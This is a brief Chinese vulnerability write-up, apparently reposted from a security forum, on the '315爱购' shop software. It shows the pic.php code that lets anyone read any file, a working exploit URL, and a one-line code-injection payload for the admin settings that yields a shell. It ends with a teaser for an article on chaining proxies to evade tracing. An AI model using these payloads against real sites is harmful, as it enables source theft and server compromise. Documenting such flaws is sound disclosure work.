315爱购程序任意文件源码查看

pic.php

function url_base64_decode($code)
{
        if($code=="")
                return "";
    $code=str_replace("!",'+',$code);
    $code=str_replace(",",'/',$code);
    $str=base64_decode($code);
    return $str;
}
$url=url_base64_decode($_GET["url"]);
//....省略
header("Content-type: image/jpeg");
echo file_get_contents($url);

exp:http://site/pic.php?url=aW5kZXgucGhw

后台GETSHELL

系统基本参数->网站所在目录：->${ PHPINFO()}

摘自：https://t00ls.net/viewthread.php?tid=20491&extra=page%3D1%26amp%3Borderby%3Ddateline%26amp%3Bfilter%3D2592000

文章来源于lcx.cc:315爱购程序任意文件源码查看

相关推荐: 多层代理下解决链路低延迟的技巧，多层代理网络匿迹，反追踪，隐藏、保护自己

0x00 背景 大多数小伙伴们在渗透测试的时候经常需要挂多层代理隐藏行踪，往往采取在较小的成本上达到最大化资源的利用实现多层代理，并且保持较低的网络延迟进行正常工作。而想要利用多环链路进行匿名，就必须忍受速度质量的降低，我们往往只能在这二者之间寻找平衡点，所谓…